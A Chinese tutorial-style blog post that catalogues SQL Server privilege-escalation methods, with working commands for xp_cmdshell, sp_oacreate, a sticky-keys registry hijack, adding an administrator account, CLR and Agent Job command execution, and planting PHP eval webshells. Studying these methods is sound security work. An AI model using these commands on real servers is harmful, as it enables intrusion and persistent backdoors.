SQL Server 数据库常见提权总结

前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权。

目录

基础知识

权限判定

系统数据库

存储过程

常见系统存储过程

常见扩展存储过程

xp_cmdshell扩展存储过程提权

xp_dirtree写入文件提权

sp_oacreate提权

xp_regwrite映像

沙盒提权

CLR提权

Agent Job提权

R和python脚本执行提权

差异备份写入webshell


基础知识

权限判定

在SQLsever中有三种特殊的用户:

  • 系统管理员(dba权限),对应服务器角色sysadmin,可以执行SQLserver的任何动作,包括数据库操作、文件管理、命令执行、注册表读取等,是SQLserver的最高权限。
  • 数据库所有者(dbo权限),对应数据库db_owner,可以执行数据库中技术所有动作,包括文件管理、数据库操作等。
  • public角色,是一个特殊的固定角色,数据库的每个合法用户都属于该角色,它为数据库中的用户提供了所有默认权限。
#判断是否dba权限
select IS_SRVROLEMEMBER('sysadmin');
#判断是否dbo权限
select IS_SRVROLEMEMBER('db_owner');
#判断是否public权限
select IS_SRVROLEMEMBER('public');

系统数据库

库名含义
mastermaster数据库控制SQLserver数据库所有方面。这个数据库包括了所有的配置信息、用户登录信息、当前正在服务器中运行的过程信息等。
modelmodel数据库是建立所有用户数据库时的模版。新建数据库时,SQLserver会把model数据库中的所有对象建立一份拷贝并移动到新数据库中。
tempdbtempdb数据库时一个非常特殊的数据库,供所有访问SQLserver数据库的用户使用。这个库用来保存所有临时表、存储过程和其他SQLserver临时建立的东西。
msdbmsdb数据库是数据库的特例,查看数据库的实际定义,又会发现它是一个用户数据库。所有的任务调度、报警、操作员都存储在msdb数据库中,还有另一个功能就是用来存储所有备份历史。SqlServer agent将会使用这个库。

存储过程

 数据库中的存储过程可以看作是对编程中面向对象方法的模拟,将存储过程理解为函数调用的过程,使用execute命令执行存储过程。存储过程为数据库提供了强大的功能,在相应的权限下,攻击者可以利用不同的存储过程执行不同的高级功能,如创建数据库用户、枚举文件目录、执行任意系统命令等。所以SqlServer2008之后的版本分别对存储过程做了权限控制,以防滥用。

存储过程也分为几类:

  • 系统存储过程:主要存储在master数据库中,以"sp_"为前缀,在任何数据库中都可以调用,在调用的时候不必再存储过程前加上数据库名。
  • 扩展存储过程:对动态链接库(DLL)函数的调用,主要用于客户端与服务器端或客户端之间进行通信的,以"xp_"为前缀,使用方法与系统存储过程类似。
  • 用户定义的存储过程:SQLServer的使用者编写的存储过程。

常见系统存储过程

系统存储过程说明
sp_databases列出服务器上的所有数据库
sp_helpdb报告有关指定数据库或所有数据库的信息
sp_renamedb更改数据库的名称
sp_tables

返回当前环境下可查询的对象的列表

sp_columns回显某个表列的信息
sp_help查看某个表的所有信息
sp_helpconstraint查看某个表的约束
sp_helpindex查看某个表的索引
sp_stored_procedures列出当前环境中的所有存储过程
sp_password添加或修改登录账户的密码
sp_helptext显示默认值、未加密的存储过程、用户定义的存储过程、触发器或视图的实际文本
sp_oacreate删除、复制、移动文件等
sp_oamethod执行文件
sp_makewebtask创建一项生成HTML文档的任务,该文档包含执行过的查询语句返回的数据
#列出当前系统中的数据库
exec sp_databases#修改数据库的名称
exec sp_renamedb 'Northwind','Northwind1'#写入一句话木马(这里的一句话木马要转换成URL格式)
exec sp_makewebtask 'c:\shell.jsp','select'' %3C%25%65%78%65%63%75%74%65 %72%65%71%75%65%73%74%28%22%76%61%6C%75%65%22%29%25%3E'''--#其他使用类似,有点偷懒了

常见扩展存储过程

xp_cmdshell

使用xp_cmdshell可以连接sql server的时候执行doc命令。

调用语法:exec xp_cmdshell DOS命令 [NOT_OUTPUT]

#获取D盘下的目录
exec master.sys.xp_cmdshell 'dir D:\'

需要注意的是:

1、首次使用需要使用exec sys.sp_configure @configname = 'xp_cmdshell',@configvalue = 1 来启用xp_cmdshell ,默认情况下,sql server 是禁用本功能的

2、可以使用 no_output 来忽略输出结果;

xp_dirtree

返回文件的目录结构。

使用方法:

exec xp_dirtree '文件目录'           #列出指定目录所有文件、目录、子目录

exec xp_dirtree '文件目录',1        #列出指定目录的目录

exec xp_dirtree'文件目录',1,1      #列出指定目录的目录、文件

xp_logininfo:返回数据库服务器windows用户和windows组的信息。

xp_regread:读取注册表信息。

xp_regwrite:写入注册表信息。

xp_enumds:进行与ODBC连接。

xp_loginconfig:配置服务器安全模式信息。

xp_makecab:创建压缩卷。

xp_ntsec_enumdomains:查看domain信息。

xp_terminate_jroces:查看终端进程

xp_cmdshell扩展存储过程提权

此存储过程在SqlServer2000中默认开启,2005及以后的版本默认禁止。

前提条件:

  • 已经获取到SqlServer的sysadmin权限用户的账号和密码
  • SqlServer服务未降权
  • SqlServer允许外连

1、首先开启xp_shell

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;

如果xp_cmdshell被删除,可以重新上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

2、执行命令

EXEC master.dbo.xp_cmdshell '命令'

3、关闭xp_cmdshell

exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

xp_dirtree写入文件提权

一般写入webshell提权最费解之一的事情就是获取绝对路径,可以通过SqlServer的扩展存储过程来进行获取和写入。

条件:服务器未被降权,有写入功能,但是SqlServer之后数据库就默认被降权为mssql了,写入写入不了。

具体过程:

1、利用xp_dirtree获取到文件的绝对路径

exec xp_dirtree 'C:',1,1

2、然后再利用xp_cmdshell写入木马

#写入木马
exec xp_cmdshell "echo '^<?php @eval($_POST[123]);?^>' >c:\2.php"

sp_oacreate提权

在xp_cmdshell被删除或不能利用可以考虑利用sp_oacreate,sp_oacreate是一个存储过程,可以删除、复制、移动文件,配合sp_oamethod来写文件执行系统命令

利用条件:需要SqlServer的sysadmin账户即服务器权限为system(但SqlServer2019默认被降权未mssql)。

1、首先判断sp_oacreate是否存在,返回1证明存在

select count(*) from master.dbo.sysobjects where xtype='x' and name='sp_oacreate'

2、开启sp_oacreate

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'ole automation procedures',1;
reconfigure;

3、执行命令

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

4、无回显,可以把文件内容导入数据库表中,然后再使用查询语句查询内容

bulk insert readfile from 'D:\1.txt';
select * from readfile;

xp_regwrite映像

xp_regread 与 xp_regwrite两个存储过程脚本可以直接读取与写入注册表,利用regwrite函数修改注册表,起到劫持作用。

利用条件:

  • SqlServer系统权限可以修改注册表
  • system权限

1、判断xp_rewrite是否存在,返回1证明存在

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'

2、开启xp_rewrite

EXEC sp_configure 'show advanced options',1;RECONFIGURE
EXEC sp_configure 'xp_regwrite',1;RECONFIGURE

这里实验没有权限修改注册表。

3、劫持注册表

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

4、查看是否劫持成功

EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

劫持成功后连按5次shift会弹出cmd(win defender会拦截弹出的cmd并删除已经劫持的注册表) 

5、关闭xp_write

EXEC sp_configure 'show advanced options',1;RECONFIGURE
EXEC sp_configure 'xp_regwrite',0;RECONFIGURE

沙盒提权

当执行命令方法无法使用时,可以使用沙盒进行提权。

沙盒模式是一种安全功能。在沙盒模式下,Access只对控件和字段属性中的安全且不含恶意代码的表达式求值。如果表达式不使用可能以某种方式损坏数据的函数或属性,则认为它是安全的。

一般情况下,注册表中mdb数据库不允许执行系统命令,但是开启沙盒模式,就允许mdb文件执行数据库,通过查询方式调用mdb文件,执行参数,绕过系统本身自己的执行命令,实现mdb文件执行命令。

利用条件:

  • sqlserver的sysadmin账户权限为system
  • 一般在32位操作系统以上,拥有jet.oledb.4.0驱动

1、开启Ad Hoc Distributed Queries

exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;

2、开启沙盒模式:0是禁用,1是仅在允许范围内,2是必须在access模式下,3是完全开启

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

因为这里没有Microsoft.jet.oledb.4.0,因此显示拒绝 访问。

3、执行系统命令

执行添加一个管理员margin命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net user margin margin /add")')

net user查看用户是否添加成功

然后将margin用户提升到超级管理员权限

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows/system32/ias/ias.mdb','select shell("net localgroup administrators margin /add")')

net localgroup administrators 查看超级管理员组账户是否提权成功。

4、恢复配置

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;exec sp_configure 'show advanced options',0;reconfigure;

CLR提权

Microsoft SQL server2005之后具备与Microsoft .NET Framework的公共语言运行时(CLR)的集成。CLR集成使得现在可以使用.NET Framework语言编写代码,从而能够在SQL server上运行,那么就意味着可以通过C#来编写SQL server自定义函数、存储过程、触发器等。

利用条件:

  • 需要dba权限,运行在system下
  • SQLserver上能启动CLR并可以创建自定义存储过程

1、开启CLR

exec sp_configure 'show advanced options',1;
RECONFIGURE;
exec sp_configure 'clr enabled',1;
RECONFIGURE;

2、当导入了不安全的程序集之后,需将数据库标记为可信任

ALTER DATABASE master SET TRUSTWORTHY ON;

3、编写一个CLR

(1)首先在本地visual studio创建一个SQL Server数据库项目,然后在项目中添加一个存储过程

(2)然后写入代码,右键生成,会在工作当前目录下生成几个文件

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
public partial class StoredProcedures
{[Microsoft.SqlServer.Server.SqlProcedure]public static void SqlStoredProcedure1 (){// 在此处放置代码System.Diagnostics.Process process = new System.Diagnostics.Process();process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;process.StartInfo.FileName = "cmd.exe";process.StartInfo.Arguments = "/C whoami > c:\\temp\\1.txt";process.Start();}
}

(3)然后注册DLL

(4)注册完成后,创建存储过程

CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](4000)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME sp_cmdExec.StoredProcedures.CmdExec

4、执行系统命令

EXEC sp_cmdExec 'whoami';

5、删除存储过程和程序集

DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY sp_cmdExec;

Agent Job提权

SqlServer代理是一项Microsoft Windows服务,它执行计划的管理任务,这些任务在SqlServer中称作为作业。

利用条件:需要dba权限。

1、启动sqlagent

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

2、利用任务计划命令执行,创建任务test并执行命令,将结果写入1.txt

use msdb;
exec sp_delete_job null,'test';
exec sp_add_job 'test';
exec sp_add_jobstep null,'test',null,'1','cmdexec','cmd /c "whoami>D:/1.txt"';
exec sp_add_jobserver null,'test',@@servername;
exec sp_start_job 'test';

3、命令执行成功如果没有回显,可以采取把1.txt写入表中,然后使用查询语句查询表使得内容回显。

Use model;
bulk insert readfile from 'D:\1.txt';
select * from readfile;

R和python脚本执行提权

在SqlServer2017及更高版本中,R与Python一起随附在机器学习服务中,所以可以通过sp_execute_external_script执行Python和R脚本。

利用条件:

  • dbo或dba权限
  • SqlServer允许执行外部脚本

1、开启dba权限

EXEC sp_configure 'external scripts enabled',1;RECONFIGURE

2、执行命令

-- 利用R执行命令
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
--利用python执行命令
exec sp_execute_external_script
@language =N'Python',
@script=N'import subprocess
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'

3、关闭dba权限

EXEC sp_configure 'external scripts enabled',0;RECONFIGURE

差异备份写入webshell

dbo和dba都有备份数据库权限,可以把数据库备份成可执行脚本放入web目录里,获得webshell

利用条件:

  • 知道网站绝对路径并且允许写入文件
  • dbo或dba权限
  • 数据库必须存在备份文件

1、生成备份文件

backup database test to disk = 'C:\phpstudy_pro\WWW\1.bak';

2、创建表并写入一句话木马

create table test([cmd][image]);
Insert into test(cmd)values(0x3c3f70687020406576616c28245f524551554553545b2761275d293b3f3e);#<?php @eval($_REQUEST['a']);?>的hex编码

3、将数据库进行差异备份

backup database test to disk='C:\phpstudy_pro\WWW\shell.php' WITH DIFFERENTIAL,FORMAT;

参考链接:

SQL Server提权总结 - 知乎

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/290103.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux安装redis(基于CentOS系统,Ubuntu也可参考)

前言&#xff1a;本文内容为实操记录&#xff0c;仅供参考&#xff01; 一、下载并解压Redis 1、执行下面的命令下载redis&#xff1a;wget https://download.redis.io/releases/redis-6.2.6.tar.gz 2、解压redis&#xff1a;tar xzf redis-6.2.6.tar.gz 3、移动redis目录&a…

和数集团董事长唐毅一行参加香港加密峰会

2024年3月26日-27日&#xff0c;和数集团董事长唐毅、UM Company CEO Rubens、QUANTIX CAPITAL风险投资基金CEO Jake一行&#xff0c;参加了亚太地区重要的Web3会议“WOW Summit HongKong 2024”。 UM Company CEO Rubens、和数集团董事长唐毅、QUANTIX CAPITAL风险投资基金 CE…

【Java八股面试系列】中间件-Redis

目录 Redis 什么是Redis Redis解决了什么问题 Redis的实现原理 数据结构 String 常用命令 应用场景 List(列表) 常用命令 应用场景 Hash(哈希) 常用命令 应用场景 set(集合) 常见命令​编辑 应用场景 Sorted Set(有序集合) 常见命令​编辑 应用场景 数据持…

Day46:WEB攻防-注入工具SQLMAPTamper编写指纹修改高权限操作目录架构

目录 数据猜解-库表列数据&字典 权限操作-文件&命令&交互式 提交方法-POST&HEAD&JSON 绕过模块-Tamper脚本-使用&开发 分析拓展-代理&调试&指纹&风险&等级 知识点&#xff1a; 1、注入工具-SQLMAP-常规猜解&字典配置 2、注入…

助力低碳出行 | 基于ACM32 MCU的电动滑板车方案

前言 随着智能科技的快速发展&#xff0c;电动滑板车的驱动系统也得到了长足的发展。国内外的电动滑板车用电机驱动系统分为传统刷式电机和无刷电机两种类型。其中&#xff0c;传统的刷式电机已经逐渐被无刷电机所取代&#xff0c;无刷电机的性能和寿命都更出色&#xff0c;已成…

pandas数据保存与加载

安装操作Excel模拟数据写入编辑读取切片操作 统计 安装 pip install pandas pip install numpyExcel环境安装 pip install xlrd pip install xlwt pip install openpyxi操作Excel import pandas as pd 模拟数据 写入 import pandas as pd# 模拟需要写入的数据 dic{name:[…

【计算机网络篇】数据链路层(4.2)可靠传输的实现机制

文章目录 &#x1f354;可靠传输的实现机制⭐停止 - 等待协议&#x1f5d2;️注意 &#x1f50e;停止 - 等待协议的信道利用率&#x1f5c3;️练习题 ⭐回退N帧协议&#x1f388;回退N帧协议的基本工作流程&#x1f50e;无传输差错的情况&#x1f50e;超时重传的情况&#x1f5…

大话设计模式之迪米特法则

迪米特法则&#xff0c;也称为最少知识原则&#xff08;Law of Demeter&#xff09;&#xff0c;是面向对象设计中的一个重要原则&#xff0c;其核心思想是降低耦合度、减少对象之间的依赖关系&#xff0c;从而使系统更加灵活、易于维护和扩展。 根据迪米特法则&#xff0c;一…

【考研数学】线代跟张宇,还是李永乐?

干吗要做选择&#xff0c;你可以全部都要的嘛&#xff01; 基础阶段选张宇&#xff0c;强化阶段选李永乐&#xff0c;这样搭配可以说是最佳了。 先来说下两位老师各自的特点&#xff0c;张宇老师&#xff0c;讲线代通俗易懂&#xff0c;技巧运用得溜溜的。他的课&#xff0c;…

samba实现linux共享文件夹

一、samba安装 sudo apt install samba 二、配置Samba 编辑Samba配置文件sudo vi /etc/samba/smb.conf 在文件末尾添加以下内容&#xff0c;设置一个简单的共享目录&#xff08;替换path_to_share为实际的共享目录路径&#xff09;&#xff1a; [Share] path /path_to_sha…

Linux:详解TCP协议段格式

文章目录 认识TCPTCP协议段格式 本篇主要总结的是TCP协议的一些字段 认识TCP TCP协议全称是传输控制协议&#xff0c;也就是说是要对于数据的传输进行一个控制 以上所示的是对于TCP协议进行数据传输的一个理解过程 全双工 至此就可以对于TCP协议是全双工的来进行理解了&…

【计算机图形学】3D Implicit Transporter for Temporally Consistent Keypoint Discovery

对3D Implicit Transporter for Temporally Consistent Keypoint Discovery的简单理解 文章目录 1. 现有方法限制和文章改进2. 方法2.1 寻找时间上一致的3D特征点2.1.1 3D特征Transporter2.1.2 几何隐式解码器2.1.3 损失函数 2.2 使用一致特征点的操纵 1. 现有方法限制和文章改…

[2023] 14届

1.日期统计 题意 1.日期统计 - 蓝桥云课 (lanqiao.cn) 思路 用dfs扫 对每一个位进行限制 花了一个小时 注意把答案枚举出来 对应一下看到底对不对 code #include<iostream> #include<cstdio> #include<stack> #include<vector> #include<al…

VSCode 如何同步显示网页在手机或者平板上

首先要确保 ①电脑上安装了VsCode ②VsCode安装插件LiveServer 安装成功之后 连续按住 Alt L 、Alt O 会跳转到对应的html页面上 http://127.0.0.1:5500/....... 是这个开头的 然后打开网络 如果桌面有网上邻居的可以直接点桌面的网上邻居 进来找到WLAN这个…

为什么我的微信小程序 窗口背景色backgroundColor设置参数 无效的问题处理记录!

当我们在微信小程序 json 中设置 backgroundColor 时&#xff0c;实际在电脑的模拟器中根本看不到效果。 这是因为 backgroundColor 指的窗体背景颜色&#xff0c;而不是页面的背景颜色&#xff0c;即窗体下拉刷新或上拉加载时露出的背景。在电脑的模拟器中是看不到这个动作的…

智能工具管理系统-智能工具柜系统

智能工具管理系统-智能工具柜系统 智能工具可视化管理系统(智工具DW-S308)是依托互3D技术、云计算、大数据、RFID技术、数据库技术、AI、视频分析技术对RFID工具进行统一管理、分析的信息化、智能化、规范化的系统。 一、工具管理现状 东识RFID工具管理系统是一种便捷化的工具…

C# 高级文件操作与异步编程探索(初步)

文章目录 文本文件的读写探秘StreamReader 类深度剖析StreamWriter 类细节解读编码和中文乱码的解决方案 二进制文件的读写BinaryReader 类全面解析BinaryWriter 类深度探讨 异步编程与C#的未来方向同步与异步&#xff1a;本质解读Task 的神奇所在async/await 的魔法 在现代编程…

【ESP32S3 Sense接入语音识别+MiniMax模型对话】

1. 前言 围绕ESP32S3 Sense接入语音识别MiniMax模型对话展开&#xff0c;首先串口输入“1”字符&#xff0c;随后麦克风采集2s声音数据&#xff0c;对接百度在线语音识别&#xff0c;将返回文本结果丢入MiniMax模型&#xff0c;进而返回第二次结果文本&#xff0c;实现语言对话…

Day53:WEB攻防-XSS跨站SVGPDFFlashMXSSUXSS配合上传文件添加脚本

目录 MXSS UXSS&#xff1a;Universal Cross-Site Scripting HTML&SVG&PDF&SWF-XSS&上传&反编译(有几率碰到) SVG-XSS PDF-XSS Python生成XSS Flash-XSS 知识点&#xff1a; 1、XSS跨站-MXSS&UXSS 2、XSS跨站-SVG制作&配合上传 3、XSS跨站-…

【MySQL】6.MySQL主从复制和读写分离

主从复制 主从复制与读写分离 通常数据库的读/写都在同一个数据库服务器中进行&#xff1b; 但这样在安全性、高可用性和高并发等各个方面无法满足生产环境的实际需求&#xff1b; 因此&#xff0c;通过主从复制的方式同步数据&#xff0c;再通过读写分离提升数据库的并发负载…